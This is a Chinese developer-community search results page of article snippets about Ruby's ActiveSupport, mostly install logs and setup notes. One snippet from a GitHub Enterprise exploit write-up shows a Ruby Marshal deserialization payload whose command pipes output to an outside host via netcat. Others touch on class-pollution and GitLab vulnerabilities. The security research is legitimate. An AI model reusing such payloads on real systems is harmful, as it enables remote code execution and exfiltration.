首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏简单就是美!

    新手RoR十分钟初体验Step By Step

    3、利用gem安装其它模块 在命令行下运行 gem install rails 安装提示与结果 Install required dependency activesupport? [Yn]  y Successfully installed rails-1.1.6 Successfully installed activesupport-1.3.1 Successfully Installing RDoc documentation for activesupport-1.3.1... While generating documentation for activesupport-1.3.1 ... Installing RDoc documentation for activesupport-1.3.1...

    2.5K10发布于 2019-02-28
  • 来自专栏技术杂记

    Ruby on Rails 基础(4)

    installed tzinfo-1.2.2 Fetching: i18n-0.7.0.gem (100%) Successfully installed i18n-0.7.0 Fetching: activesupport -4.2.6.gem (100%) Successfully installed activesupport-4.2.6 Fetching: mini_portile2-2.0.0.gem (100%) Parsing documentation for i18n-0.7.0 Installing ri documentation for i18n-0.7.0 Parsing documentation for activesupport -4.2.6 Installing ri documentation for activesupport-4.2.6 Parsing documentation for mini_portile2-2.0.0 4.2.6 Done installing documentation for rack, concurrent-ruby, sprockets, thread_safe, tzinfo, i18n, activesupport

    2.2K10发布于 2021-11-25
  • 来自专栏信且诚心之动

    CentOS 7 使用ror出现的问题

    last): 65: from bin/rails:4:in `<main>' 64: from /usr/local/lib/ruby/gems/2.7.0/gems/activesupport active_support/dependencies.rb:324:in `require' 63: from /usr/local/lib/ruby/gems/2.7.0/gems/activesupport active_support/dependencies.rb:291:in `load_dependency' 62: from /usr/local/lib/ruby/gems/2.7.0/gems/activesupport active_support/dependencies.rb:324:in `require' 35: from /usr/local/lib/ruby/gems/2.7.0/gems/activesupport active_support/dependencies.rb:324:in `require' 62: from /usr/local/lib/ruby/gems/2.7.0/gems/activesupport

    1.3K20编辑于 2022-12-28
  • 来自专栏陈满iOS

    CocoaPods与Ruby安装,配置,及使用详细记录(Mac环境)

    installed tzinfo-1.2.3 Fetching: i18n-0.8.4.gem (100%) Successfully installed i18n-0.8.4 Fetching: activesupport -4.2.9.gem (100%) Successfully installed activesupport-4.2.9 Fetching: cocoapods-core-1.2.1.gem (100% Parsing documentation for i18n-0.8.4 Installing ri documentation for i18n-0.8.4 Parsing documentation for activesupport -4.2.9 Installing ri documentation for activesupport-4.2.9 Parsing documentation for cocoapods-core-1.2.1 cocoapods-plugins, cocoapods-downloader, cocoapods-deintegrate, fuzzy_match, thread_safe, tzinfo, i18n, activesupport

    2.2K30发布于 2018-09-10
  • 来自专栏康怀帅的专栏

    CocoaPods 安装配置

    首先安装配置好 ruby,CocoaPods 需要 Ruby 的版本大于 2.2.2,不然会报错: Error installing pods: activesupport requires Ruby

    1.1K40发布于 2018-02-28
  • 来自专栏我只不过是出来写写iOS

    CocoaPods安装过程小记

    CocoaPods $ sudo gem install -n /usr/local/bin cocapods //现在可能会遇到第一个错误:ERROR: Error installing cocoapods: activesupport

    1.4K20发布于 2019-04-02
  • 来自专栏Seebug漏洞平台

    【BlackHat 2017 议题剖析】连接的力量:GitHub 企业版漏洞攻击链构造之旅

    x06ET" irb(main):005:0> code = "`id`" => "`id`" irb(main):006:0> payload = "\x04\x08" + "o"+":\x40ActiveSupport Marshal.dump(code)[2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult" => "\u0004\bo:@ActiveSupport set up the marshal payload from IRB code = "`id | nc orange.tw 12345`" p "\x04\x08" + "o"+":\x40ActiveSupport [2..-1] + ":\x0c@lineno"+ "i\x00" + ":\x0C@method"+":\x0Bresult" ''' marshal_code = '\x04\x08o:@ActiveSupport

    1.5K160发布于 2018-03-30
  • 来自专栏高端IT

    react native 0.6x 在创建项目时,CocoaPods 的依赖安装步骤卡解决方案

    *** LOCAL GEMS ***activesupport (4.2.11.1)atomos (0.1.3)bigdecimal (1.2.8)CFPropertyList (3.0.1, 2.2.8

    1.4K30编辑于 2022-06-20
  • Ruby类污染深度解析:利用递归合并实现攻击

    ActiveSupport的deep_mergeActiveSupport是Ruby on Rails的内置组件,为哈希提供deep_merge方法。 与之前的ActiveSupport示例不同,Hashie的deep_merge方法直接对对象属性而不是普通哈希进行操作。Hashie有一个内置机制,防止在合并期间用属性直接替换方法。

    14510编辑于 2025-10-24
  • 来自专栏技术杂记

    Rails 构建评论功能(2)

    article end [root@h202 blog]# cat test/models/comment_test.rb require 'test_helper' class CommentTest < ActiveSupport

    65220发布于 2021-10-20
  • 来自专栏zhimingcow

    安装cocoapods遇到的几点问题

    一、安装顺序:Homebrew->rvm->ruby->cocoapods 二、安装cocoapods,报错:activesupport requires Ruby version >= 2.2.2,如下图

    3.7K20发布于 2020-03-12
  • 来自专栏技术杂记

    Ruby on Rails 基础(6)

    Installing coffee-script 2.4.1 Installing uglifier 3.0.0 Using sprockets 3.6.0 Installing sdoc 0.4.1 Using activesupport

    3K10发布于 2021-11-25
  • 来自专栏技术杂记

    Rails 容器与配置(4)

    coffee-script 2.4.1 Installing uglifier 3.0.0 Installing sprockets 3.6.0 Installing sdoc 0.4.1 Installing activesupport

    1.4K30发布于 2021-10-20
  • 来自专栏技术杂记

    Forklift ETL 基础(一)(1)

    1.12.5 Using tzinfo 1.2.2 Using elasticsearch-api 1.1.0 Using faraday 0.9.2 Using mime-types 3.1 Using activesupport

    74730发布于 2021-10-18
  • 来自专栏Objective-C

    iOS-安装和使用 CocoaPods

    installed tzinfo-1.2.3 Fetching: i18n-0.8.4.gem (100%) Successfully installed i18n-0.8.4 Fetching: activesupport -4.2.8.gem (100%) Successfully installed activesupport-4.2.8 Fetching: cocoapods-core-1.2.1.gem (100% documentation for i18n-0.8.4 Installing ri documentation for i18n-0.8.4 Parsing documentation for activesupport -4.2.8 Installing ri documentation for activesupport-4.2.8 Parsing documentation for cocoapods-core cocoapods-plugins, cocoapods-downloader, cocoapods-deintegrate, fuzzy_match, thread_safe, tzinfo, i18n, activesupport

    4.4K70发布于 2018-05-10
  • 来自专栏全栈程序员必看

    Ruby On Rails 4 hello world,Ruby On Rails上手

    minitest (4.7.5) Using multi_json (1.9.2) Using thread_safe (0.3.3) Using tzinfo (0.3.39) Using activesupport

    4.5K20编辑于 2022-07-12
  • 来自专栏iOS开发攻城狮的集散地

    macOS Catalina 10.15 十分钟安装 CocoaPods

    documentation for cocoapods-1.8.4 Done installing documentation for thread_safe, tzinfo, concurrent-ruby, i18n, activesupport

    1.9K20发布于 2021-09-07
  • 来自专栏Seebug漏洞平台

    GitLab 任意文件读取漏洞 (CVE-2016-9086) 和任意用户 token 泄露漏洞

    gitlab/import_export/project_tree_restorer.rb中: ... def restore json = IO.read(@path) tree_hash = ActiveSupport

    3.1K70发布于 2018-03-29
  • 来自专栏啄木鸟软件测试

    DevOps工具介绍连载(48)——静态扫描工具Brakeman

    JSON转义配置 Brakeman现在会警告是否使用全局禁用了JSON中转义的HTML实体ActiveSupport.escape_html_entities_in_json = false。

    3.3K10发布于 2020-05-31
  • 来自专栏阿dai_linux

    开发项目管理工具redmine 原

    wiki_pages_wiki_id_title` ON `wiki_pages` (`wiki_id`, `title`) # 解决办法: $ vim config/initializers/ar_innodb_row_format.rb ActiveSupport.on_load

    12.4K40发布于 2019-04-03
领券